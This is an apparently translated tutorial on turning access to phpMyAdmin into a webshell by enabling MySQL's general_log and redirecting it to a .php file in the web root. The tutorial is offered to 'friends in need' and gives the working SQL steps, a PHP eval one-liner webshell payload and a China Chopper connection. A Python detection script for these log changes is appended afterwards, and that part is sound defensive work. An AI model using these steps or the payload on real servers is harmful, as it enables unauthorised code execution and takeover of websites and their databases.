This column from the phpMyAdmin usage tutorial series introduces a new technique for getting a shell through phpMyAdmin. I hope it will be helpful to friends in need!
Baidu Encyclopedia: phpMyAdmin is a PHP-based MySQL database management tool that runs in web-based mode on the website host and allows administrators to manage MySQL databases through a web interface. This web interface makes it easier to enter complex SQL syntax, especially when importing and exporting large amounts of data. One of its greater advantages is that phpMyAdmin runs on the web server like other PHP programs, but the HTML pages it generates can be used from anywhere, that is, to manage the MySQL database remotely and easily create, modify, and delete databases and data tables. You can also use phpMyAdmin to generate commonly used PHP syntax, which helps keep the SQL syntax correct when writing web pages.
In layman's terms, its function is to conveniently operate the database on the web page.
Once we have access to a site's phpMyAdmin page, the next step is to get a shell.
Privileges can be escalated by writing a shell, which requires the following conditions:
1. Database root permissions
2. Know the physical path of the website
3. The database has write permissions
Write the shell with select '64d8a9f9d2660d1aa18735456c689d78' INTO OUTFILE 'Website physical path'
This article mainly covers how to get a shell when condition 3 is not met.
Prerequisite: MySQL 5.0
MySQL 5.0 automatically creates a log file, and the log's global variables can be modified while the service is running, so the location of the log file can be changed. However, you must have read and write permissions on the directory where the log is generated.
(This may be harder in a Linux environment, because the site directory belongs to one user and MySQL runs as another. Permission control is stricter there, so it mainly depends on whether the permissions are configured properly.)
First we test whether the site has write permission.
Execute the SQL statement SHOW VARIABLES LIKE 'secure_file_priv'
This queries the value of secure_file_priv. The secure-file-priv parameter restricts which directory LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE() may read from or write to.
Next, two MySQL global variables come into play (general_log, general_log_file).
Execute the SQL statement SHOW VARIABLES LIKE 'general_log%' to perform a wildcard query.
The log is disabled by default.
We execute the SQL statements
set global general_log = "ON"; # enable the log
SET global general_log_file='physical path under the website'; # change the log path
Successfully created
Then execute a special query statement
select '<?php eval($_POST[aaa]);?>'
We open 112233.php to verify, and the shell has been written successfully.
Finally, connect with China Chopper (菜刀) to obtain the site's webshell.
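From the defender's side, the steps above leave a clear trace: general_log is switched on at runtime and general_log_file is pointed at a script file inside the web root. The following detection sketch is an added example, not part of the original article; the web root, the extension list, and the sample statements are constructed assumptions.

```python
import re

# Extensions a web server may pass to an interpreter (assumed list, tune per site).
SCRIPT_EXTS = {".php", ".phtml", ".php5", ".jsp", ".asp", ".aspx"}

# Matches SET GLOBAL general_log / general_log_file with a quoted or bare value.
SET_LOG_RE = re.compile(
    r"set\s+(?:global\s+|@@global\.)(general_log(?:_file)?)\s*=\s*"
    r"(?:'([^']*)'|" r'"([^"]*)"|(\w+))', re.IGNORECASE)

def _norm(path):
    # Compare case-insensitively with forward slashes; over-matching is acceptable here.
    return path.replace("\\", "/").rstrip("/").lower()

def risky_log_path(path, web_roots):
    """Return the reasons a general_log_file value deserves an alert (empty if none)."""
    p = _norm(path)
    name = p.rsplit("/", 1)[-1]
    ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
    reasons = []
    if ext in SCRIPT_EXTS:
        reasons.append("script extension " + ext)
    for root in web_roots:
        r = _norm(root)
        if p == r or p.startswith(r + "/"):
            reasons.append("inside web root " + root)
    return reasons

def scan_statements(statements, web_roots):
    """Return (statement number, finding) pairs for runtime general-log changes."""
    findings = []
    for n, stmt in enumerate(statements, 1):
        for m in SET_LOG_RE.finditer(stmt):
            var = m.group(1).lower()
            value = m.group(2) or m.group(3) or m.group(4) or ""
            if var == "general_log" and value.lower() in ("on", "1"):
                findings.append((n, "general_log enabled at runtime"))
            elif var == "general_log_file":
                findings += [(n, "general_log_file " + r)
                             for r in risky_log_path(value, web_roots)]
    return findings

# Constructed sample statements, as they might appear in a query audit trail.
SAMPLE = [
    "SHOW VARIABLES LIKE 'general_log%'",
    'set global general_log = "ON"',
    "SET global general_log_file='/var/www/html/112233.php'",
    "SET GLOBAL general_log_file='/var/lib/mysql/host.log'",
]

if __name__ == "__main__":
    for finding in scan_statements(SAMPLE, ["/var/www/html"]):
        print(finding)
```

The same two checks can be run against the live values returned by SHOW VARIABLES LIKE 'general_log%' to catch a redirect that has already happened.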